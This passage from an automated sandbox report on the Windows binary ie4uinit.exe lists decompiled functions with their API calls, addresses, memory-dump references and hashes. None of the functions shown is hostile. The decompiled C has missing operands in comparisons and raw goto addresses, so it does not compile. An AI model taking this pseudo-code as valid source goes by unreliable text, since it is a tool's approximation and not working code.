				_t28 =  ==  ? 0x80004005 : _t18;
				_t44 =  ==  ? 0x80004005 : _t18;
				if (( ==  ? 0x80004005 : _t18) < 0) goto 0x319d3a92;
				_t20 = E00007FF77FF7319D365C(_t33, _t46, _t47, __rcx, _t59, _t61, _t66);
				if ( *((intOrPtr*)(__rcx + 8)) == 0) goto 0x319d3aa1;
				ReleaseMutex(??);
				return _t20;
			}

0x7ff7319d39e0
0x7ff7319d39e0
0x7ff7319d39e0
0x7ff7319d39e0
0x7ff7319d39e5
0x7ff7319d39ea
0x7ff7319d39f7
0x7ff7319d39fe
0x7ff7319d3a04
0x7ff7319d3a06
0x7ff7319d3a14
0x7ff7319d3a16
0x7ff7319d3a23
0x7ff7319d3a26
0x7ff7319d3a28
0x7ff7319d3a34
0x7ff7319d3a37
0x7ff7319d3a39
0x7ff7319d3a41
0x7ff7319d3a44
0x7ff7319d3a47
0x7ff7319d3a4d
0x7ff7319d3a4f
0x7ff7319d3a57
0x7ff7319d3a60
0x7ff7319d3a65
0x7ff7319d3a6f
0x7ff7319d3a78
0x7ff7319d3a81
0x7ff7319d3a84
0x7ff7319d3a86
0x7ff7319d3a8b
0x7ff7319d3a99
0x7ff7319d3a9b
0x7ff7319d3ab7

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7319D3A09
GetLastError.KERNEL32 ref: 00007FF7319D3A16
GetLastError.KERNEL32 ref: 00007FF7319D3A2A
GetLastError.KERNEL32 ref: 00007FF7319D3A39
#74.IERTUTIL ref: 00007FF7319D3A6F
ReleaseMutex.KERNEL32 ref: 00007FF7319D3A9B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 3488842590-0
Opcode ID: 72630aa3288f511306bac9450482be0dd7f32d28d8b1f85fcbea46afe0c7ed76
Instruction ID: 5ba225aa977c47f347d839f67f807c6a6a73ee3cf0502d4b5cbe49d4c83dbbc3
Opcode Fuzzy Hash: 72630aa3288f511306bac9450482be0dd7f32d28d8b1f85fcbea46afe0c7ed76
Instruction Fuzzy Hash: 9021C962F0DBC6A5FB447B669888335B390AF48B95FC44138DA5D83799DFACE4406331

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E3F30 Relevance: 9.0, APIs: 6, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7319E38A9), ref: 00007FF7319E3F61
GetCurrentProcessId.KERNEL32(?,?,?,00007FF7319E38A9), ref: 00007FF7319E3F6F
GetCurrentThreadId.KERNEL32 ref: 00007FF7319E3F7B
GetTickCount.KERNEL32 ref: 00007FF7319E3F87
GetTickCount.KERNEL32 ref: 00007FF7319E3F97
QueryPerformanceCounter.KERNEL32(?,?,?,00007FF7319E38A9), ref: 00007FF7319E3FB2

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: 4aac9e0af9f426e54d478a5ad2f8f5328a72a4dcf3b7aefea67b7d74eefd4843
Instruction ID: a054f5fe2b561a77e6231fe653c10fc4a7c2a904b0d563367a8b9491410f8152
Opcode Fuzzy Hash: 4aac9e0af9f426e54d478a5ad2f8f5328a72a4dcf3b7aefea67b7d74eefd4843
Instruction Fuzzy Hash: 79112135A09F819AEB00EF71E8450A873B4FB4975CB801A35EA6D87758EF7CD5648360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF8CC Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

#793.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF8F0
#791.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF8FD
#791.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF913
#597.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF91D
#594.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF927
#398.IERTUTIL(?,?,?,00007FF7319C1117), ref: 00007FF7319DF931

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #791$#398#594#597#793
String ID:
API String ID: 1768570115-0
Opcode ID: 3a0599031467f5ca40ba1caf257b0c025dbfb019dc45839994e4534930ebf393
Instruction ID: 19813b133ec2244dedb9e40d7fa6187378a70629b5f4db0c8c4257c89da1a808
Opcode Fuzzy Hash: 3a0599031467f5ca40ba1caf257b0c025dbfb019dc45839994e4534930ebf393
Instruction Fuzzy Hash: 21118232D0C6C3B2FB247B50A8592789350EF5578CFD54434D94917759CEACA8CAA331

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E11BC Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF7319E11CD
OpenThreadToken.ADVAPI32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E11E0
GetLastError.KERNEL32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E11EA
GetCurrentProcess.KERNEL32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1210
OpenProcessToken.ADVAPI32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1221
GetLastError.KERNEL32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E122F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentErrorLastOpenProcessThreadToken
String ID:
API String ID: 4013858454-0
Opcode ID: e7078a2e127753b83308feb79ad805bb6b5e0d0d91dabb846eb6c4fc2db20935
Instruction ID: 2742b88999227c9acb1520ff9aa5b3907a048b7e50be04b84038235449c4d453
Opcode Fuzzy Hash: e7078a2e127753b83308feb79ad805bb6b5e0d0d91dabb846eb6c4fc2db20935
Instruction Fuzzy Hash: C3018C71F19B8296EB486B26D864379A3D0AF48B54F80803CD94FCA298EE6CE4449334

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DE150 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 270
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF7319DE150(void* __ecx, long long __rcx, void* __rdx, void* __r8, long long __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t119;
				void* _t125;
				void* _t130;
				long long _t181;
				long long _t183;
				signed long long _t194;
				void* _t200;
				signed long long* _t201;
				long long _t226;
				void* _t231;
				intOrPtr* _t232;
				struct _CRITICAL_SECTION* _t235;
				signed long long _t239;
				signed long long _t240;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t259;
				struct _CRITICAL_SECTION* _t260;
				signed long long _t262;
				void* _t268;
				long long _t270;
				void* _t275;
				char* _t276;
				void* _t279;
				signed int _t280;

				 *((long long*)(_t246 + 0x20)) = __r9;
				 *((long long*)(_t246 + 8)) = __rcx;
				_t3 = _t246 - 7; // -76
				_t244 = _t3;
				_t247 = _t246 - 0xb8;
				_t201 =  *((intOrPtr*)(_t244 + 0x6f));
				_t270 = __rdx - __r8;
				_t276 =  *((intOrPtr*)(_t244 + 0x7f));
				_t262 =  *(_t244 + 0x77) - _t201;
				 *((char*)(_t247 + 0x30)) = 0;
				_t181 = __r8 - _t201;
				 *((long long*)(_t244 + 0x57)) = _t270;
				 *((long long*)(_t244 + 0x5f)) = _t181;
				_t226 = __r9 - _t276;
				 *(_t244 + 0x77) = _t262;
				 *((long long*)(_t244 - 0x41)) = _t226;
				 *((long long*)(_t244 - 0x49)) = 3;
				_t232 = _t181 + _t201;
				_t280 =  *_t232;
				 *((long long*)(_t244 - 0x61)) =  *((intOrPtr*)(_t232 + _t270));
				 *(_t244 - 0x69) = _t280;
				if (__r9 == 0) goto 0x319de1d4;
				if (( *(_t226 + _t276) & 0x00000002) == 0) goto 0x319de1d4;
				sil = 1;
				goto 0x319de1d7;
				sil = 0;
				if (__r9 == 0) goto 0x319de1e7;
				if (( *(_t226 + _t276) & 0x00000001) != 0) goto 0x319de1e7;
				goto 0x319de1e9;
				if (__r9 == 0) goto 0x319de1f9;
				 *(_t244 + 0x4f) = 1;
				if (( *(_t226 + _t276) & 0x00000004) != 0) goto 0x319de1fd;
				 *(_t244 + 0x4f) = 0;
				if (1 == 0) goto 0x319de222;
				if (_t280 - 8 <= 0) goto 0x319de222;
				r8d = 8;
				__imp__StrCmpNIA(_t200, _t243);
				if (1 != 0) goto 0x319de222;
				goto 0x319de224;
				if (sil != 0) goto 0x319de243;
				if (0 != 0) goto 0x319de243;
				 *_t276 = 0;
				 *_t201 =  *((intOrPtr*)(_t232 + _t270));
				_t183 =  *_t232;
				 *((long long*)(_t201 + _t262)) = _t183;
				goto 0x319de505;
				 *_t276 = 0;
				r12d = 0;
				 *(_t244 - 0x79) = _t235;
				if (0 == 0) goto 0x319de442;
				_t31 = _t235 - 1; // -1
				_t32 = _t280 + 1; // 0x1
				_t233 = _t32;
				_t33 = _t235 + 2; // 0x2
				_t184 =  <  ? _t31 : _t183;
				E00007FF77FF7319C1670();
				if (( <  ? _t31 : _t183) == 0) goto 0x319de3bd;
				 *(_t244 - 0x59) =  *(_t244 - 0x59) & _t235;
				if (_t32 == 0) goto 0x319de3ae;
				_t41 = _t244 - 0x59; // -165
				 *(_t247 + 0x20) = _t41;
				_t119 = E00007FF77FF7319DDEA4(_t33 * _t32, _t33 * _t32 >> 0x20, _t201,  *((intOrPtr*)(_t244 - 0x61)), _t280,  <  ? _t31 : _t183, _t32, _t279);
				if (_t119 < 0) goto 0x319de3ae;
				 *(_t244 - 0x71) =  *(_t244 - 0x71) & _t235;
				r8d = 0;
				__imp__CreateUri();
				if (_t119 < 0) goto 0x319de38c;
				 *(_t244 - 0x31) =  *(_t244 - 0x31) & _t235;
				_t49 = _t262 + 6; // 0x6
				r8d = _t49;
				 *(_t244 - 0x11) =  *(_t244 - 0x11) & 0;
				_t52 = _t244 - 0x39; // -133
				asm("xorps xmm0, xmm0");
				 *((long long*)(_t244 - 0x39)) = 0x319e54a0;
				asm("movdqu [ebp-0x21], xmm0");
				 *((intOrPtr*)(_t244 - 0x29)) = 0xb;
				if (E00007FF77FF7319DDFC0(_t201, _t52,  *(_t244 - 0x71), _t235, _t244, _t275, _t268) < 0) goto 0x319de381;
				r12d =  *(_t244 - 0x11);
				r15d = 2 + _t262 * 4;
				 *(_t244 - 0x59) = _t280;
				E00007FF77FF7319C1670();
				if (0x319e54a0 == 0) goto 0x319de371;
				 *0x319e54a0 = 0x64;
				_t61 = _t244 - 0x59; // -165
				 *(_t247 + 0x20) = _t61;
				if (E00007FF77FF7319DDDDC(_t120, r12d, _t201,  *((intOrPtr*)(_t244 - 0x19)),  *(_t244 - 0x71), 0x319e54a0, 0x7ff7319e54a1, _t280 - 1) < 0) goto 0x319de362;
				 *(_t244 - 0x79) =  *(_t244 - 0x59) + 2;
				goto 0x319de37d;
				E00007FF77FF7319C1698(_t61,  *(_t244 - 0x59) + 2);
				goto 0x319de376;
				_t239 =  *(_t244 - 0x79);
				_t281 =  *(_t244 - 0x69);
				_t68 = _t244 - 0x39; // -133
				E00007FF77FF7319DDF48(_t201, _t68);
				goto 0x319de391;
				if ( *(_t244 - 0x71) == 0) goto 0x319de3b3;
				 *(_t244 - 0x71) =  *(_t244 - 0x71) & 0x00000000;
				 *0x319e7038();
				goto 0x319de3b3;
				_t125 = E00007FF77FF7319C1698( *((intOrPtr*)( *( *(_t244 - 0x71)) + 0x10)), _t184);
				goto 0x319de3c2;
				if (0x8007000e < 0) goto 0x319de4e2;
				_t73 = _t239 - 2; // -2
				_t74 = _t281 - 9; // -9
				if (_t73 - _t74 < 0) goto 0x319de424;
				 *_t201 =  *((intOrPtr*)(_t244 - 0x61));
				 *(_t201 +  *(_t244 + 0x77)) =  *(_t244 - 0x69);
				if ( *(_t244 + 0x4f) != 0) goto 0x319de4f5;
				EnterCriticalSection(_t260);
				if ( *0x319f45b8 != 0) goto 0x319de412;
				E00007FF77FF7319DF3B8(_t125, _t201, 0x319f45b0, _t239, _t231);
				LeaveCriticalSection(_t235);
				goto 0x319de4f5;
				if ( *(_t244 + 0x4f) == 0) goto 0x319de442;
				 *_t276 = 1;
				_t80 = _t239 - 1; // -1
				 *_t201 = _t239;
				 *(_t201 +  *(_t244 + 0x77)) = _t80;
				goto 0x319de501;
				 *(_t244 + 0x4f) =  *(_t244 + 0x4f) & 0x00000000;
				_t85 = _t244 + 0x4f; // 0x3
				_t194 = _t85;
				r15b =  *((char*)(_t247 + 0x30)) == 0;
				 *(_t247 + 0x28) = _t194;
				 *(_t247 + 0x20) =  *(_t247 + 0x20) & 0x00000000;
				r9d = r13d;
				if (E00007FF77FF7319DF43C(r15b, _t201, 0x319f45b0,  *(_t244 - 0x71), _t233, _t239, _t244,  *((intOrPtr*)(_t244 - 0x61)), _t259) < 0) goto 0x319de4da;
				E00007FF77FF7319C1670();
				_t240 = _t194;
				if (_t194 == 0) goto 0x319de4d6;
				_t94 = _t244 + 0x4f; // 0x3
				 *(_t247 + 0x28) = _t94;
				r9d = r13d;
				 *(_t247 + 0x20) = _t240;
				if (E00007FF77FF7319DF43C(r15b, _t201, 0x319f45b0,  *(_t244 - 0x71), _t233, _t240, _t244,  *((intOrPtr*)(_t244 - 0x61)), _t259) < 0) goto 0x319de4ce;
				 *((char*)(_t247 + 0x30)) =  *((char*)(_t247 + 0x30)) + 1;
				 *_t276 = 1;
				 *_t201 = _t240;
				 *(_t201 +  *(_t244 + 0x77)) = 0x319f45b0;
				goto 0x319de4f5;
				E00007FF77FF7319C1698( *(_t244 + 0x77), _t240);
				if (0x8007000e >= 0) goto 0x319de42a;
				 *_t201 = 0x319edede;
				 *(_t201 +  *(_t244 + 0x77)) =  *(_t201 +  *(_t244 + 0x77)) & 0x00000000;
				_t130 = E00007FF77FF7319C1698( *(_t244 + 0x77),  *(_t244 + 0x77));
				_t110 = _t244 - 0x49;
				 *_t110 =  *((long long*)(_t244 - 0x49)) - 1;
				if ( *_t110 != 0) goto 0x319de1b0;
				return _t130;
			}

0x7ff7319de150
0x7ff7319de155
0x7ff7319de166
0x7ff7319de166
0x7ff7319de16b
0x7ff7319de172
0x7ff7319de17d
0x7ff7319de180
0x7ff7319de184
0x7ff7319de18a
0x7ff7319de18f
0x7ff7319de192
0x7ff7319de199
0x7ff7319de19d
0x7ff7319de1a0
0x7ff7319de1a4
0x7ff7319de1a8
0x7ff7319de1b0
0x7ff7319de1b8
0x7ff7319de1bb
0x7ff7319de1bf
0x7ff7319de1c6
0x7ff7319de1cd
0x7ff7319de1cf
0x7ff7319de1d2
0x7ff7319de1d4
0x7ff7319de1da
0x7ff7319de1e1
0x7ff7319de1e5
0x7ff7319de1ec
0x7ff7319de1f3
0x7ff7319de1f7
0x7ff7319de1f9
0x7ff7319de1ff
0x7ff7319de205
0x7ff7319de207
0x7ff7319de214
0x7ff7319de21c
0x7ff7319de220
0x7ff7319de227
0x7ff7319de22b
0x7ff7319de22d
0x7ff7319de234
0x7ff7319de237
0x7ff7319de23a
0x7ff7319de23e
0x7ff7319de245
0x7ff7319de249
0x7ff7319de24c
0x7ff7319de257
0x7ff7319de25d
0x7ff7319de261
0x7ff7319de261
0x7ff7319de265
0x7ff7319de26b
0x7ff7319de272
0x7ff7319de27d
0x7ff7319de283
0x7ff7319de28a
0x7ff7319de294
0x7ff7319de29b
0x7ff7319de2a6
0x7ff7319de2ad
0x7ff7319de2b3
0x7ff7319de2bb
0x7ff7319de2c6
0x7ff7319de2ce
0x7ff7319de2df
0x7ff7319de2e3
0x7ff7319de2e3
0x7ff7319de2e8
0x7ff7319de2eb
0x7ff7319de2ef
0x7ff7319de2f2
0x7ff7319de2f6
0x7ff7319de2fb
0x7ff7319de30b
0x7ff7319de30d
0x7ff7319de319
0x7ff7319de31c
0x7ff7319de320
0x7ff7319de32b
0x7ff7319de32d
0x7ff7319de338
0x7ff7319de340
0x7ff7319de34f
0x7ff7319de35c
0x7ff7319de360
0x7ff7319de365
0x7ff7319de36f
0x7ff7319de376
0x7ff7319de37d
0x7ff7319de381
0x7ff7319de385
0x7ff7319de38a
0x7ff7319de398
0x7ff7319de39a
0x7ff7319de3a6
0x7ff7319de3ac
0x7ff7319de3b6
0x7ff7319de3bb
0x7ff7319de3c4
0x7ff7319de3ca
0x7ff7319de3ce
0x7ff7319de3d5
0x7ff7319de3df
0x7ff7319de3e6
0x7ff7319de3ea
0x7ff7319de3f7
0x7ff7319de404
0x7ff7319de40d
0x7ff7319de419
0x7ff7319de41f
0x7ff7319de428
0x7ff7319de42a
0x7ff7319de42e
0x7ff7319de432
0x7ff7319de439
0x7ff7319de43d
0x7ff7319de442
0x7ff7319de446
0x7ff7319de446
0x7ff7319de45e
0x7ff7319de462
0x7ff7319de46a
0x7ff7319de470
0x7ff7319de47a
0x7ff7319de47f
0x7ff7319de484
0x7ff7319de48a
0x7ff7319de490
0x7ff7319de494
0x7ff7319de4a0
0x7ff7319de4a3
0x7ff7319de4b2
0x7ff7319de4bb
0x7ff7319de4bf
0x7ff7319de4c5
0x7ff7319de4c8
0x7ff7319de4cc
0x7ff7319de4d1
0x7ff7319de4dc
0x7ff7319de4e9
0x7ff7319de4f0
0x7ff7319de4f8
0x7ff7319de514
0x7ff7319de514
0x7ff7319de51d
0x7ff7319de536

APIs

StrCmpNIA.SHLWAPI ref: 00007FF7319DE214
EnterCriticalSection.KERNEL32 ref: 00007FF7319DE3F7
LeaveCriticalSection.KERNEL32 ref: 00007FF7319DE419

Part of subcall function 00007FF7319DF3B8: QueueUserWorkItem.KERNEL32 ref: 00007FF7319DF3D7

CreateUri.URLMON ref: 00007FF7319DE2C6

Part of subcall function 00007FF7319C1698: GetProcessHeap.KERNEL32 ref: 00007FF7319C16A5
Part of subcall function 00007FF7319C1698: HeapFree.KERNEL32 ref: 00007FF7319C16B3

Strings

https://, xrefs: 00007FF7319DE20D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CriticalHeapSection$CreateEnterFreeItemLeaveProcessQueueUserWork
String ID: https://
API String ID: 2263833432-4275131719
Opcode ID: 8888d486f500b6f11ff04df45abe5502008c35d4091c926cecfe9cd506a0d2bb
Instruction ID: 95b34cf4cc045319b8e9471718e29cb948141de509374afc5e2344f28374b4d5
Opcode Fuzzy Hash: 8888d486f500b6f11ff04df45abe5502008c35d4091c926cecfe9cd506a0d2bb
Instruction Fuzzy Hash: 02C16C33F09A86A9E710EF61D4083ADA7A5BB44B8CF940035DE4D57B89DFB9E025D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DCE8C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF77FF7319DCE8C(void* __eax, unsigned int __edx, long long __rbx, void* __rcx, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
				intOrPtr _v52;
				char _v56;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				long _t77;
				long _t80;
				intOrPtr _t82;
				void* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t89;
				signed int _t95;
				signed int _t99;
				void* _t104;
				signed int _t106;
				signed int _t124;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				void* _t174;
				intOrPtr _t175;
				void* _t176;
				void* _t180;
				void* _t181;

				_t169 = __rbx;
				_a16 = __rbx;
				r14d = __edx;
				_t174 = __rcx;
				r15d = 0;
				_v72 = r15d;
				_t175 =  *((intOrPtr*)(__rcx + 0x430));
				if (_t175 != 0) goto 0x319dcec3;
				goto 0x319dd1bf;
				r12d = 1;
				if ((r12b & r14b) == 0) goto 0x319dcf1d;
				_t6 =  &_v56; // 0x51
				__imp__GetFileSizeEx();
				if (__eax != 0) goto 0x319dcf4b;
				_t77 = GetLastError();
				_t78 =  ==  ? r12d : _t77;
				_t135 =  ==  ? r12d : _t77;
				if (( ==  ? r12d : _t77) > 0) goto 0x319dcf04;
				_t104 =  ==  ? r12d : GetLastError();
				goto 0x319dcf19;
				_t80 = GetLastError();
				_t81 =  ==  ? r12d : _t80;
				_t106 = ( ==  ? r12d : _t80) & 0x0000ffff | 0x80070000;
				_v72 = _t106;
				if (_t106 < 0) goto 0x319dd1bf;
				if ((r14b & 0x00000002) == 0) goto 0x319dcff3;
				r10d =  *((intOrPtr*)(__rcx + 0x44c));
				if (r10d - 0x600000 <= 0) goto 0x319dcf75;
				goto 0x319dd1bf;
				if (_v52 - r15d <= 0) goto 0x319dcf5c;
				goto 0x319dd1bf;
				_t109 =  !=  ? 0x80070570 : 0x80070570;
				_v72 =  !=  ? 0x80070570 : 0x80070570;
				goto 0x319dcf22;
				if ( *((intOrPtr*)(__rcx + 0x438)) != 0x60) goto 0x319dcf44;
				_t126 =  *((intOrPtr*)(__rcx + 0x43c));
				if (_t126 - 0x60 <= 0) goto 0x319dcf44;
				if (_t126 == 0) goto 0x319dcf44;
				_t82 =  *((intOrPtr*)(__rcx + 0x440));
				if (_t82 == 0) goto 0x319dcf44;
				_t83 = _t82 + _t126;
				r8d = r8d | 0xffffffff;
				r9d = r8d;
				r9d =  >=  ? _t83 : r9d;
				_a24 = r9d;
				if (_t83 - _t126 < 0) goto 0x319dcfed;
				_t127 =  *((intOrPtr*)(__rcx + 0x444));
				if (r9d != _t127) goto 0x319dcfed;
				if (_t127 == 0) goto 0x319dcf44;
				_t84 =  *((intOrPtr*)(__rcx + 0x448));
				if (_t84 == 0) goto 0x319dcf44;
				_t85 = _t84 + _t127;
				r8d =  >=  ? _t85 : r8d;
				_a32 = r8d;
				if (_t85 - _t127 < 0) goto 0x319dcf44;
				if (r8d == r10d) goto 0x319dcff3;
				goto 0x319dcf44;
				_v72 = 0x80070570;
				if (0x80070570 < 0) goto 0x319dd1bf;
				r14d =  *(_t175 + 4);
				if (r14d >= 0) goto 0x319dd017;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf18;
				goto 0x319dd0c9;
				if ( *((intOrPtr*)(__rcx + 0x438)) ==  *((intOrPtr*)(_t175 + 0x5c))) goto 0x319dd035;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf1c;
				goto 0x319dd0c9;
				if ( *((intOrPtr*)(__rcx + 0x43c)) ==  *((intOrPtr*)(_t175 + 8))) goto 0x319dd050;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf20;
				goto 0x319dd0c9;
				_t128 =  *((intOrPtr*)(__rcx + 0x440));
				if (_t128 ==  *((intOrPtr*)(_t175 + 0xc))) goto 0x319dd06b;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf24;
				goto 0x319dd0c9;
				if ( *((intOrPtr*)(__rcx + 0x444)) ==  *((intOrPtr*)(_t175 + 0x24))) goto 0x319dd086;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf28;
				goto 0x319dd0c9;
				_t89 =  *((intOrPtr*)(__rcx + 0x448));
				if (_t89 ==  *((intOrPtr*)(_t175 + 0x28))) goto 0x319dd0a1;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf2c;
				goto 0x319dd0c9;
				if (_t128 -  *((intOrPtr*)(_t175 + 0x14)) >= 0) goto 0x319dd0b6;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf30;
				goto 0x319dd0c9;
				if (_t89 -  *((intOrPtr*)(_t175 + 0x30)) >= 0) goto 0x319dd0cb;
				_v72 = 0x80070570;
				 *0x319f4fe0 = 0xf34;
				if (0x80070570 < 0) goto 0x319dd1b4;
				if ( *((intOrPtr*)(_t175 + 0x40)) + 0xffffff80 - r12d > 0) goto 0x319dd1a4;
				_a8 = r15d;
				if ((r14d & 0xfffffff8) == 0) goto 0x319dd108;
				_a8 = 0x80070570;
				 *0x319f4fe0 = 0xf42;
				if (0x80070570 < 0) goto 0x319dd19a;
				_v80 = 0x6727;
				_v88 =  *((intOrPtr*)(_t175 + 0x20));
				_v96 =  *((intOrPtr*)(__rcx + 0x440));
				_v104 =  *((intOrPtr*)(_t175 + 0x14));
				r9d =  *(_t175 + 0x10);
				r8d =  *(_t175 + 0x1c);
				_t95 = E00007FF77FF7319DCD8C(r14d >> 0x00000001 & r12b,  *((intOrPtr*)(_t175 + 0x18)), _v56, __rbx, _t6, _t176, _t180, _t181);
				_a8 = _t95;
				if (_t95 < 0) goto 0x319dd19a;
				r14d = r14d >> 2;
				r14b = r14b & r12b;
				_v80 = 0x1d;
				_v88 =  *((intOrPtr*)(_t175 + 0x3c));
				_v96 =  *((intOrPtr*)(_t174 + 0x448));
				_v104 =  *((intOrPtr*)(_t175 + 0x30));
				r9d =  *(_t175 + 0x2c);
				r8d =  *(_t175 + 0x38);
				_t124 = r14b;
				_t99 = E00007FF77FF7319DCD8C(_t124,  *((intOrPtr*)(_t175 + 0x34)), _v56, _t169, _t6, _t176, _t180, _t181);
				_a8 = _t99;
				_t116 =  >=  ? r15d : _t99;
				_v72 =  >=  ? r15d : _t99;
				goto 0x319dd1b4;
				_v72 = _t124;
				 *0x319f4fe0 = 0xf69;
				_v72 = 0x80070570;
				return 0x80070570;
			}

0x7ff7319dce8c
0x7ff7319dce8c
0x7ff7319dce9d
0x7ff7319dcea0
0x7ff7319dcea3
0x7ff7319dcea9
0x7ff7319dcead
0x7ff7319dceb7
0x7ff7319dcebe
0x7ff7319dcec3
0x7ff7319dcecc
0x7ff7319dcece
0x7ff7319dceda
0x7ff7319dcee2
0x7ff7319dcee4
0x7ff7319dceec
0x7ff7319dcef0
0x7ff7319dcef2
0x7ff7319dcefe
0x7ff7319dcf02
0x7ff7319dcf04
0x7ff7319dcf0c
0x7ff7319dcf13
0x7ff7319dcf19
0x7ff7319dcf24
0x7ff7319dcf2e
